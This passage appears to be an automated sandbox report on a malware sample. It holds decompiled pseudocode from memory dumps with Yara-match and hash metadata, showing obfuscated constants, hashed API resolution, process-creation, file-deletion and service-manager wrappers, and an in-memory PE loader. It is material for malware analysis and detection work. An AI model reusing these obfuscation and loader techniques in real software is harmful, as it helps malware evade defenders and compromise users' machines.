                                                      				_t248 = _t249 - 0x5c;
                                                      				_t242 =  *((intOrPtr*)(_t248 + 0x6c));
                                                      				_t245 = __edx;
                                                      				_push(0);
                                                      				_push( *((intOrPtr*)(_t248 + 0x78)));
                                                      				_push( *((intOrPtr*)(_t248 + 0x74)));
                                                      				_push( *((intOrPtr*)(_t248 + 0x70)));
                                                      				_push(_t242);
                                                      				_push( *((intOrPtr*)(_t248 + 0x68)));
                                                      				_push( *((intOrPtr*)(_t248 + 0x64)));
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t188);
                                                      				 *(_t248 + 0x38) = 0xda0c;
                                                      				 *(_t248 + 0x38) =  *(_t248 + 0x38) << 7;
                                                      				_t215 = 0x75;
                                                      				 *(_t248 + 0x38) =  *(_t248 + 0x38) * 0x59;
                                                      				 *(_t248 + 0x38) =  *(_t248 + 0x38) ^ 0x25e734ff;
                                                      				 *(_t248 + 0x54) = 0xb39d;
                                                      				 *(_t248 + 0x54) =  *(_t248 + 0x54) << 6;
                                                      				 *(_t248 + 0x54) =  *(_t248 + 0x54) | 0xca3cae0f;
                                                      				 *(_t248 + 0x54) =  *(_t248 + 0x54) * 0xe;
                                                      				 *(_t248 + 0x54) =  *(_t248 + 0x54) ^ 0x0f551016;
                                                      				 *(_t248 + 0x1c) = 0x5da7;
                                                      				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x52b401ed;
                                                      				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) / _t215;
                                                      				 *(_t248 + 0x1c) =  *(_t248 + 0x1c) ^ 0x00b496a1;
                                                      				 *(_t248 + 0x30) = 0xba31;
                                                      				_t216 = 0x2c;
                                                      				 *(_t248 + 0x30) =  *(_t248 + 0x30) / _t216;
                                                      				 *(_t248 + 0x30) =  *(_t248 + 0x30) | 0x346b3718;
                                                      				 *(_t248 + 0x30) =  *(_t248 + 0x30) ^ 0x346b13e9;
                                                      				 *(_t248 + 0x2c) = 0x6402;
                                                      				_t217 = 0x3f;
                                                      				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) * 0x14;
                                                      				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) >> 2;
                                                      				 *(_t248 + 0x2c) =  *(_t248 + 0x2c) ^ 0x0001cbcb;
                                                      				 *(_t248 + 0x34) = 0x3e45;
                                                      				 *(_t248 + 0x34) =  *(_t248 + 0x34) << 0xb;
                                                      				 *(_t248 + 0x34) =  *(_t248 + 0x34) >> 2;
                                                      				 *(_t248 + 0x34) =  *(_t248 + 0x34) ^ 0x007ce60c;
                                                      				 *(_t248 + 0x3c) = 0xfd38;
                                                      				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) + 0xffffe888;
                                                      				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) * 0x69;
                                                      				 *(_t248 + 0x3c) =  *(_t248 + 0x3c) ^ 0x005e4f03;
                                                      				 *(_t248 + 0x40) = 0xcc4c;
                                                      				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x07f5c2dc;
                                                      				 *(_t248 + 0x40) =  *(_t248 + 0x40) / _t217;
                                                      				 *(_t248 + 0x40) =  *(_t248 + 0x40) ^ 0x00207040;
                                                      				 *(_t248 + 0x28) = 0x6724;
                                                      				 *(_t248 + 0x28) =  *(_t248 + 0x28) + 0xffffafc3;
                                                      				 *(_t248 + 0x28) =  *(_t248 + 0x28) << 1;
                                                      				 *(_t248 + 0x28) =  *(_t248 + 0x28) ^ 0x000008e0;
                                                      				 *(_t248 + 0x24) = 0x9d87;
                                                      				 *(_t248 + 0x24) =  *(_t248 + 0x24) >> 6;
                                                      				 *(_t248 + 0x24) =  *(_t248 + 0x24) * 0x24;
                                                      				 *(_t248 + 0x24) =  *(_t248 + 0x24) ^ 0x00004341;
                                                      				 *(_t248 + 0x58) = 0xb89d;
                                                      				 *(_t248 + 0x58) =  *(_t248 + 0x58) >> 0xb;
                                                      				 *(_t248 + 0x58) =  *(_t248 + 0x58) + 0x8f1;
                                                      				 *(_t248 + 0x58) =  *(_t248 + 0x58) << 8;
                                                      				 *(_t248 + 0x58) =  *(_t248 + 0x58) ^ 0x00091f00;
                                                      				 *(_t248 + 0x44) = 0x534f;
                                                      				 *(_t248 + 0x44) =  *(_t248 + 0x44) + 0x522f;
                                                      				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c12b7e9;
                                                      				 *(_t248 + 0x44) =  *(_t248 + 0x44) ^ 0x4c125009;
                                                      				 *(_t248 + 0x20) = 0x7c36;
                                                      				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x32feb437;
                                                      				_t218 = 0x73;
                                                      				 *(_t248 + 0x20) =  *(_t248 + 0x20) / _t218;
                                                      				 *(_t248 + 0x20) =  *(_t248 + 0x20) ^ 0x0071b2de;
                                                      				 *(_t248 + 0x4c) = 0x6d80;
                                                      				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xd21e;
                                                      				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) + 0xffff4640;
                                                      				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x36936ae7;
                                                      				 *(_t248 + 0x4c) =  *(_t248 + 0x4c) ^ 0x3693cc91;
                                                      				 *(_t248 + 0x50) = 0x11c0;
                                                      				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x65d8412a;
                                                      				_t219 = 0x49;
                                                      				 *(_t248 + 0x50) =  *(_t248 + 0x50) / _t219;
                                                      				 *(_t248 + 0x50) =  *(_t248 + 0x50) | 0x06211354;
                                                      				 *(_t248 + 0x50) =  *(_t248 + 0x50) ^ 0x076544c6;
                                                      				 *(_t248 + 0x18) = 0x8ddc;
                                                      				 *(_t248 + 0x18) =  *(_t248 + 0x18) | 0x3e354716;
                                                      				 *(_t248 + 0x18) =  *(_t248 + 0x18) ^ 0x3e35d915;
                                                      				 *(_t248 + 0x14) = 0xfbdb;
                                                      				 *(_t248 + 0x14) =  *(_t248 + 0x14) * 0x44;
                                                      				 *(_t248 + 0x14) =  *(_t248 + 0x14) ^ 0x0042d7a4;
                                                      				 *(_t248 + 0x48) = 0xd404;
                                                      				 *(_t248 + 0x48) =  *(_t248 + 0x48) >> 1;
                                                      				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0x728c;
                                                      				 *(_t248 + 0x48) =  *(_t248 + 0x48) + 0xfe7d;
                                                      				 *(_t248 + 0x48) =  *(_t248 + 0x48) ^ 0x0001b0de;
                                                      				_t220 =  *(_t248 + 0x38);
                                                      				E002493A8( *(_t248 + 0x38),  *(_t248 + 0x54),  *(_t248 + 0x1c), _t248 - 0x40, 0x44,  *(_t248 + 0x30));
                                                      				 *((intOrPtr*)(_t248 - 0x40)) = 0x44;
                                                      				_t209 = E0024976F( *(_t248 + 0x2c), _t248 + 4,  *(_t248 + 0x34),  *(_t248 + 0x3c),  *(_t248 + 0x40),  *(_t248 + 0x28), _t248 - 0x40, _t245,  *(_t248 + 0x24),  *(_t248 + 0x38), _t220,  *(_t248 + 0x58),  *(_t248 + 0x44), _t220,  *(_t248 + 0x20),  *(_t248 + 0x4c),  *((intOrPtr*)(_t248 + 0x64)), _t220,  *((intOrPtr*)(_t248 + 0x74))); // executed
                                                      				if(_t209 == 0) {
                                                      					_t210 = 0;
                                                      				} else {
                                                      					if(_t242 == 0) {
                                                      						E00244F7D( *(_t248 + 0x50),  *(_t248 + 0x18),  *((intOrPtr*)(_t248 + 4)));
                                                      						E00244F7D( *(_t248 + 0x14),  *(_t248 + 0x48),  *((intOrPtr*)(_t248 + 8)));
                                                      					} else {
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      						asm("movsd");
                                                      					}
                                                      					_t210 = 1;
                                                      				}
                                                      				return _t210;
                                                      			}















                                                      0x00235915
                                                      0x0023591f
                                                      0x00235951
                                                      0x00235921
                                                      0x00235923
                                                      0x0023593a
                                                      0x00235948
                                                      0x00235925
                                                      0x00235928
                                                      0x00235929
                                                      0x0023592a
                                                      0x0023592b
                                                      0x0023592b
                                                      0x0023592e
                                                      0x0023592e
                                                      0x00235959

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID: @p
                                                      • API String ID: 963392458-2609516012
                                                      • Opcode ID: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                                      • Instruction ID: 9b68dfc197bd47c961eea7753a341801ad8ae656a43dfa8ae10a79af61eee005
                                                      • Opcode Fuzzy Hash: d31ca1205623dc1cdc77aa9fcf8a92b76c26a84db24defd749b4b1a88d353f87
                                                      • Instruction Fuzzy Hash: DB912572510248EFDF58CF61C94A9CE3BA1FF44348F508119FE1A961A0D3B6D959CF80
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E0023C0C6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				signed int _v64;
                                                      				intOrPtr _v68;
                                                      				intOrPtr _v72;
                                                      				char _v592;
                                                      				void* _t141;
                                                      				void* _t159;
                                                      				signed int _t161;
                                                      				signed int _t162;
                                                      				signed int _t163;
                                                      				signed int _t164;
                                                      
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0023602B(_t141);
                                                      				_v64 = _v64 & 0x00000000;
                                                      				_v60 = _v60 & 0x00000000;
                                                      				_v72 = 0x2e7eef;
                                                      				_v68 = 0x12a0e3;
                                                      				_v36 = 0x822d;
                                                      				_v36 = _v36 ^ 0x7542ca13;
                                                      				_v36 = _v36 >> 8;
                                                      				_v36 = _v36 ^ 0x00755fa2;
                                                      				_v48 = 0xc0ea;
                                                      				_t161 = 0x4d;
                                                      				_v48 = _v48 * 0x52;
                                                      				_v48 = _v48 + 0x53ba;
                                                      				_v48 = _v48 ^ 0x003e0539;
                                                      				_v8 = 0xf2be;
                                                      				_v8 = _v8 ^ 0xca92c6dd;
                                                      				_v8 = _v8 | 0xdeb53509;
                                                      				_v8 = _v8 + 0x330e;
                                                      				_v8 = _v8 ^ 0xdeb75724;
                                                      				_v28 = 0xbc60;
                                                      				_v28 = _v28 * 3;
                                                      				_v28 = _v28 ^ 0x088be546;
                                                      				_v28 = _v28 ^ 0x0889fb38;
                                                      				_v20 = 0x79be;
                                                      				_v20 = _v20 / _t161;
                                                      				_t162 = 0x2f;
                                                      				_v20 = _v20 * 0x21;
                                                      				_v20 = _v20 / _t162;
                                                      				_v20 = _v20 ^ 0x000058f8;
                                                      				_v12 = 0x6f12;
                                                      				_v12 = _v12 + 0x2ef8;
                                                      				_v12 = _v12 ^ 0xc4c69b2c;
                                                      				_t163 = 0x19;
                                                      				_v12 = _v12 / _t163;
                                                      				_v12 = _v12 ^ 0x07dec8f1;
                                                      				_v16 = 0x233d;
                                                      				_v16 = _v16 >> 0xd;
                                                      				_v16 = _v16 ^ 0xb86ca57e;
                                                      				_v16 = _v16 ^ 0x25a63868;
                                                      				_v16 = _v16 ^ 0x9dca839c;
                                                      				_v44 = 0x9c92;
                                                      				_v44 = _v44 ^ 0x484225af;
                                                      				_v44 = _v44 << 0xa;
                                                      				_v44 = _v44 ^ 0x0ae4f7f7;
                                                      				_v56 = 0xf3a1;
                                                      				_v56 = _v56 + 0xffff3be5;
                                                      				_v56 = _v56 ^ 0x00000dea;
                                                      				_v24 = 0xe687;
                                                      				_v24 = _v24 ^ 0x2fa59812;
                                                      				_v24 = _v24 | 0x8a70baf8;
                                                      				_v24 = _v24 << 0xe;
                                                      				_v24 = _v24 ^ 0x7fbf04b5;
                                                      				_v40 = 0x7d0b;
                                                      				_v40 = _v40 + 0xffffa14c;
                                                      				_v40 = _v40 + 0x5747;
                                                      				_v40 = _v40 ^ 0x000069af;
                                                      				_v32 = 0xbccf;
                                                      				_v32 = _v32 << 0xb;
                                                      				_v32 = _v32 + 0xa312;
                                                      				_v32 = _v32 ^ 0x05e7304f;
                                                      				_v52 = 0xd186;
                                                      				_v52 = _v52 << 7;
                                                      				_t164 = 0xc;
                                                      				_v52 = _v52 / _t164;
                                                      				_v52 = _v52 ^ 0x0008a17f;
                                                      				_push(_v48);
                                                      				E00247BAF(_v52,  &_v592, _v28, _a4, _v20, _v12, E0024889D(0x24c050, _v36, _v52));
                                                      				E00242025(_v16, _t154, _v44, _v56);
                                                      				_t159 = E0024AA3C(_v24, _v40, _v32, _v52,  &_v592); // executed
                                                      				return _t159;
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID: ~.
                                                      • API String ID: 4033686569-2304494891
                                                      • Opcode ID: e11c01b653e9edafc52584965c13b241a1e557feda32ca763d527588feac30c4
                                                      • Instruction ID: bebe33c3a86c9694f0a77d57826e1209fb113644fffbee2bfd32c3a5c26e6de3
                                                      • Opcode Fuzzy Hash: e11c01b653e9edafc52584965c13b241a1e557feda32ca763d527588feac30c4
                                                      • Instruction Fuzzy Hash: F1511471C1121DEBDF48DFE5D94A8DEBBB1FB04304F208159E511B6260C7B91A54CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                                      • Instruction ID: 261cd3e86bd65de77dc65c8895570fcc03ac5bebad06e8b6854dca6c68ab90fd
                                                      • Opcode Fuzzy Hash: 143c34c34cbd3b33341801c7d9cc665edc253c7b9165565ce924f81eb71ba2ac
                                                      • Instruction Fuzzy Hash: 05215371D00209EFEF08DFA9D94A4DEBBB2EB44304F208199E415B7294E7B51B64DF81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00232959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t30;
                                                      				void* _t39;
                                                      				signed int _t41;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(0);
                                                      				_push(0);
                                                      				E0023602B(_t30);
                                                      				_v12 = 0x5e3c;
                                                      				_t41 = 0x63;
                                                      				_v12 = _v12 / _t41;
                                                      				_t42 = 0x2f;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x000064be;
                                                      				_v8 = 0x74da;
                                                      				_v8 = _v8 | 0xfefeeaea;
                                                      				_v8 = _v8 >> 0xc;
                                                      				_v8 = _v8 ^ 0x000fb531;
                                                      				E002407A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                                      				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                                      				return _t39;
                                                      			}


                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002329DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction ID: 4bda07148f96ae91c4ea11f07c8683422217309d709d9b2cf065ab4d5bd33d78
                                                      • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                                      • Instruction Fuzzy Hash: 5E015B72A00108BBEB18DF95DC4A8DFBFB6EF44310F108088F508A6250D7B65F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0023C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t29;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				E0023602B(_t29);
                                                      				_v28 = 0x4fe02f;
                                                      				_v24 = 0x232390;
                                                      				_v20 = 0xf8460;
                                                      				_v16 = 0;
                                                      				_v12 = 0xf625;
                                                      				_v12 = _v12 >> 6;
                                                      				_v12 = _v12 >> 0xa;
                                                      				_v12 = _v12 + 0xffffcc6f;
                                                      				_v12 = _v12 ^ 0xffffa5b6;
                                                      				_v8 = 0xe5cd;
                                                      				_v8 = _v8 + 0xffffae4d;
                                                      				_v8 = _v8 | 0xf8bbefe7;
                                                      				_v8 = _v8 ^ 0xf8bbcc9a;
                                                      				_t33 = E002407A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                                      				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                                      				return _t34;
                                                      			}


                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0023C762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction ID: 8d8e337f00c3192cdd29c10cc9b4f922268430cbab26b068a59f539cbbc88e3d
                                                      • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                                      • Instruction Fuzzy Hash: 9C1133B290122DBBCB25DF95DC4A8EFBFB8EF04714F108188F90962210D3714B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00231000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _t33;
                                                      				struct HINSTANCE__* _t40;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				E0023602B(_t33);
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v24 = 0x1b2eda;
                                                      				_v20 = 0x33a3b7;
                                                      				_v12 = 0x98c;
                                                      				_v12 = _v12 + 0xb426;
                                                      				_v12 = _v12 + 0x5beb;
                                                      				_t42 = 0x63;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x00000fce;
                                                      				_v8 = 0x120e;
                                                      				_v8 = _v8 + 0xfffffcb8;
                                                      				_v8 = _v8 + 0xffffefaa;
                                                      				_v8 = _v8 >> 5;
                                                      				_v8 = _v8 ^ 0x07ff9a02;
                                                      				E002407A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                                      				_t40 = LoadLibraryW(_a12); // executed
                                                      				return _t40;
                                                      			}












                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 00231096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction ID: e58eb9bd9a0dd2f4184544d5c7de3129890655c1ea17d86febe5a0eb92b555e5
                                                      • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                                      • Instruction Fuzzy Hash: AE015BB6D01308BBDF04DF94C94A5DEBBB1AB54318F108188E51466291D3B19B649F91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00234859() {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      
                                                      				_v12 = 0xafe2;
                                                      				_v12 = _v12 * 0x42;
                                                      				_v12 = _v12 + 0xffffdd89;
                                                      				_v12 = _v12 ^ 0x002d198d;
                                                      				_v8 = 0x5b09;
                                                      				_v8 = _v8 | 0xa1ea9544;
                                                      				_v8 = _v8 * 0x12;
                                                      				_v8 = _v8 ^ 0x6283d9c1;
                                                      				E002407A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                                      				ExitProcess(0);
                                                      			}







                                                      APIs
                                                      • ExitProcess.KERNELBASE(00000000), ref: 002348B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID: [
                                                      • API String ID: 621844428-1822564810
                                                      • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction ID: 7b45bb183b61e0dc11828fde01c81c53077722e1bcb1deb7bc3696ed0e51f854
                                                      • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                                      • Instruction Fuzzy Hash: 7CF017B0A15209FBDB08CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F509B51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E10001780(intOrPtr* _a4, long _a8) {
                                                      				long _t31;
                                                      				signed int _t32;
                                                      				intOrPtr* _t37;
                                                      				void* _t47;
                                                      				void** _t48;
                                                      				signed int _t52;
                                                      				signed int _t55;
                                                      				long _t56;
                                                      
                                                      				_t48 = _a8;
                                                      				_t56 = _t48[2];
                                                      				if(_t56 != 0) {
                                                      					_t52 = _t48[3];
                                                      					if((_t52 & 0x02000000) == 0) {
                                                      						_t31 =  *(0x10012080 + ((_t52 >> 0x1f) + ((_t52 >> 0x0000001e & 0x00000001) + (_t52 >> 0x0000001d & 0x00000001) * 2) * 2) * 4);
                                                      						if((_t52 & 0x04000000) != 0) {
                                                      							_t31 = _t31 | 0x00000200;
                                                      						}
                                                      						_t32 = VirtualProtect( *_t48, _t56, _t31,  &_a8); // executed
                                                      						asm("sbb eax, eax");
                                                      						return  ~( ~_t32);
                                                      					} else {
                                                      						_t47 =  *_t48;
                                                      						if(_t47 == _t48[1]) {
                                                      							if(_t48[4] != 0) {
                                                      								L7:
                                                      								VirtualFree(_t47, _t56, 0x4000); // executed
                                                      							} else {
                                                      								_t37 = _a4;
                                                      								_t55 =  *(_t37 + 0x30);
                                                      								if( *((intOrPtr*)( *_t37 + 0x38)) == _t55 || _t56 % _t55 == 0) {
                                                      									goto L7;
                                                      								}
                                                      							}
                                                      						}
                                                      						return 1;
                                                      					}
                                                      				} else {
                                                      					return _t56 + 1;
                                                      				}
                                                      			}












                                                      APIs
                                                      • VirtualFree.KERNELBASE(?,?,00004000,00000000,100013CB,?,1000195F,100013CB,?,00000000,00000000,00000000), ref: 100017CD
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
                                                      • Instruction ID: f401046966946d9f8f8c45c464924eb5d72016bba8cd02ac906e1c8dccc1d15e
                                                      • Opcode Fuzzy Hash: 0a855d0dde1407c1c92472205702e4fda3e9c4e53b097d130a35f6ebea364484
                                                      • Instruction Fuzzy Hash: EB11BF327101198BE304DE09E880F9AB3BAFF947A0F46825AF509CB295DB30E951C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 66%
                                                      			E00244F7D(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t17;
                                                      				int _t24;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0023602B(_t17);
                                                      				_v12 = 0xddd8;
                                                      				_v12 = _v12 * 0x48;
                                                      				_v12 = _v12 ^ 0x003e66d8;
                                                      				_v8 = 0xcb35;
                                                      				_v8 = _v8 ^ 0x7b88573c;
                                                      				_v8 = _v8 * 0x59;
                                                      				_v8 = _v8 ^ 0xf27e4a21;
                                                      				E002407A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                                      				_t24 = CloseHandle(_a4); // executed
                                                      				return _t24;
                                                      			}








                                                      APIs
                                                      • CloseHandle.KERNELBASE(003E66D8), ref: 00244FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction ID: d9e351559df2f839ea3f993d8248c07b88d719110bbe9f1616a24110082f9faf
                                                      • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                                      • Instruction Fuzzy Hash: 8FF037B082120CFFDB08DFA4D98689EBFBAEB40300F208199E804AB250D3715B509B51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 66%
                                                      			E10001620(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _t30;
                                                      				signed int _t31;
                                                      				void* _t38;
                                                      				void* _t49;
                                                      				void* _t51;
                                                      				intOrPtr _t53;
                                                      				signed int _t54;
                                                      				intOrPtr _t55;
                                                      				long _t56;
                                                      				signed int _t58;
                                                      				signed int _t59;
                                                      				intOrPtr* _t65;
                                                      				long _t66;
                                                      				intOrPtr _t68;
                                                      				void* _t70;
                                                      				void* _t72;
                                                      				void* _t75;
                                                      				long* _t77;
                                                      				void* _t78;
                                                      
                                                      				_t30 = _a16;
                                                      				_t55 =  *_t30;
                                                      				_t68 =  *((intOrPtr*)(_t30 + 4));
                                                      				_t31 =  *(_t55 + 0x14) & 0x0000ffff;
                                                      				_v8 = _t68;
                                                      				_v12 = 0;
                                                      				if(0 >=  *((intOrPtr*)(_t55 + 6))) {
                                                      					L15:
                                                      					return 1;
                                                      				} else {
                                                      					_t65 = VirtualAlloc;
